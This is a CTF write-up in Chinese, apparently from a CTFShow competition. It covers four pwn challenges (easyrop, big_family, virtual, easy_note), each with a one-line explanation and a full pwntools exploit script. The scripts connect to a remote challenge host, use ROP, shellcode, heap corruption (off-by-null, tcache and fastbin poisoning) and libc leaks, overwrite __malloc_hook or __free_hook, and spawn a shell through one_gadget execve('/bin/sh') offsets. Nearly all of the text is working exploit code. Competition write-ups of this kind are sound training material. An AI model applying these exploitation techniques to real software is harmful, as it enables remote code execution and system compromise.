签到
bilibili搜索CTFShow,直播👀flag
问卷调查
填好即可拿到
easyrop
简单栈溢出,将返回地址写成ROP然后在data段布置shellcode跳过去执行即可,我写了2段估计有大师傅分分钟秒解开
from pwn import *
context.terminal=['tmux','splitw','-h']
#p=process("./easyrop")
p=remote("111.231.70.44",28092)
offset=64
context.arch='amd64'
sl=asm(shellcraft.sh())
shellcode='''
pop rax
pop rsi
syscall
ret
'''
payload='a'*offset+p64(0x0004000B9)+p64(0x0000006000E0)+p64(0)+p64(0x6000E0+0x60)+p64(0x06000E0+0x60)
p.sendafter("easyrop",payload)
sleep(2)
p.send(asm(shellcode))
sleep(4)
p.send("a")
sleep(3)
p.send(sl)
p.interactive()
big_family
off by null用malloc_console构造堆块重叠写top_chunk到malloc_hook上方即可
#coding=utf-8
from pwn import *
#p=process("./family")
p=remote("111.231.70.44",28003)
elf=ELF("./family")
libc=elf.libc
def menu(idx):
p.sendlineafter(":",str(idx))
def add(size,data):
menu(1)
p.sendlineafter("?",str(size))
p.sendafter("?",data)
def delete(idx):
menu(2)
p.sendlineafter("?",str(idx))
def show(idx):
menu(3)
p.sendlineafter("?",str(idx))
context.terminal=['tmux','splitw','-h']
add(0x18,"AAA\n")
for i in range(13):
add(0x38,"A"*8+str(i)+"\n")
#add(0x10,")
add(0x18,p64(0)+p64(0x41)+"\n")
add(0x40,"\x00"*0x28+p64(0x21)+"\n")
delete(0)
delete(4)
delete(5)
delete(6)
delete(7)
delete(8)
delete(9)
menu('1'*0x500)
add(0x38, "B"*0x30+p64(0x120))
add(0x38, "C"*0x30+p32(0x40)+"\n")
add(0x38, "p"*0x30+"\n")
delete(4)
menu('1'*0x500)
delete(10)
menu("1"*0x500)
add(0x38,"a\n")
add(0x38,"a\n")
add(0x38,"a\n")
show(5)
libcbase=u64(p.recvuntil("\x7f")[-6:]+"\x00\x00")-libc.sym['__malloc_hook']-0x10-88
log.success("libcbase: "+hex(libcbase))
add(0x38, "GGG\n")#8=5
delete(0)
delete(8)
show(5)
p.recvuntil("\n")
heap=u64(p.recv(6)+"\x00\x00")-0xe0
log.success("heap: "+hex(heap))
#delete(5)
add(0x38, "dd\n")#
add(0x38, "dd\n")#0
delete(0)
delete(8)
delete(5)
delete(15)
malloc_hook=libcbase+0x3c4b10
add(0x38,p64(heap+0x370)+"\n")
add(0x38, "dd\n")
add(0x38, "dd\n")
#delete(0)
delete(14)
add(0x38, p64(0)+p64(0x51)+p64(libcbase+libc.sym['__malloc_hook']+0x10+5)+"\n")
add(0x40, "aa\n")
#delete(0)
add(0x40, '\xaa'*3+p64(0x51)+p64(malloc_hook+0x10+0x10)+"\n")
add(0x47, "\x00"*0x38+p64(malloc_hook-0x18)+"\n")
one=libcbase+0x4527a
#delete(8)
#add(0x40,p64(0)+p64(one)+"\n")
for i in range(4):
delete(i)
for i in range(6,10):
delete(i)
add(0x47,"dd\n")
add(0x47,"dd\n")
add(0x47,"dd\n")
realloc=libcbase+0x846c0#libc.sym['__libc_realloc']
add(0x47,p64(libcbase+0x4526a)+p64(realloc+16)+"\n")
#delete(11)
#delete(5)
#show(8)
#delete()
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
'''
'''
p.interactive()
virtual
这道题其实也是堆,就只要逆向一下指令就行了
from pwn import *
#p=process('./baby_vm')
p=remote("111.231.70.44",28085)
elf=ELF('./baby_vm')
libc=ELF("./libc-2.27.so")
def add(size):
return '\x06'+chr(size)
def nop():
return '\x02'
def push(content):
return '\x00\x40'+p64(content)
def pop():
return '\x01\x40'
def edit():
return '\x05\x01'
def show():
return '\x05\x02'
def free():
return '\x07'
def ret():
return '\x08'
#pause()
payload=add(0xf0)+free()+add(0xe0)+free()+add(0xd0)+free()+add(0xc0)+free()+add(0xb0)+free()+add(0xa0)+free()+add(0x90)+free()+add(0xf0)+pop()+push(0x461)+free()+add(0x20)+show()+free()+ret()
p.sendafter(':',payload)
libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-0x10-96-0x400
log.success('libcbase: '+hex(libcbase))
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
pause()
payload=add(0x40)+free()+add(0x60)+free()+add(0x70)+push(0)+push(0xe1)+push(free_hook)+free()+add(0xe0)+pop()+push(0x31)+free()+add(0xe1)+push(system)+free()+add(0x50)+edit()+free()
p.sendafter(':',payload)
#p.recv
#p.sendafter(':',payload)
#pause()
#push(0x123)
p.interactive()
easy_note
在编辑的地方可以把size改大然后泄漏随机数和libc,之后有一个任意地址写,写_free_hook即可
from pwn import *
#p=process("./daji2")
p=remote("111.231.70.44",28146)
elf=ELF("./daji2")
libc=ELF("./libc-2.27.so")
context.terminal=['tmux',"splitw","-h"]
def menu(idx):
p.sendlineafter(">",str(idx))
def add(size):
menu(1)
p.sendlineafter(":",str(size))
def show(idx):
menu(2)
p.sendlineafter(":",str(idx))
def edit(idx,size,data):
menu(3)
p.sendlineafter(":",str(idx))
p.sendlineafter(":",str(size))
#pause()
sleep(4)
p.send(data)
add(0x18)
add(0x68)
edit(0,0x20,"a"*0x18+p64(0x100))#+p64(100)+p64(0x4312321)+p64(0x602120))
show(0)
p.recvuntil("a"*0x18)
p.recv(8)
magic=u32(p.recv(4))
print hex(magic)
libcbase=u64(p.recvuntil("\x7f")[-6:]+"\x00\x00")
libcbase1=libcbase+0x400000
system=libcbase+libc.sym['system']
log.success("libcbase: "+hex(libcbase))
log.success("libcbase1: "+hex(libcbase1))
one=libcbase1+0x10a41c
free_hook=libcbase1+libc.sym['__free_hook']
log.success("libcbase: "+hex(free_hook))
#edit(0,0x100,"a"*0x18+p64(0x100)+p64(magic)+"doudou")
menu(3)
p.sendlineafter(":",str(0))
p.sendlineafter(":",str(0x80))
sleep(4)
p.send("a"*0x18+p64(0x100)+p64(magic)+p64(free_hook))
menu(3)
p.sendlineafter(":",str(0))
p.sendlineafter(":",str(0x10))
sleep(4)
p.send(p64(one))
'''
0x4f365 execve("/bin/sh", rsp+0x40, environ)
constraints:
rsp & 0xf == 0
rcx == NULL
0x4f3c2 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
0x10a45c execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
p.interactive()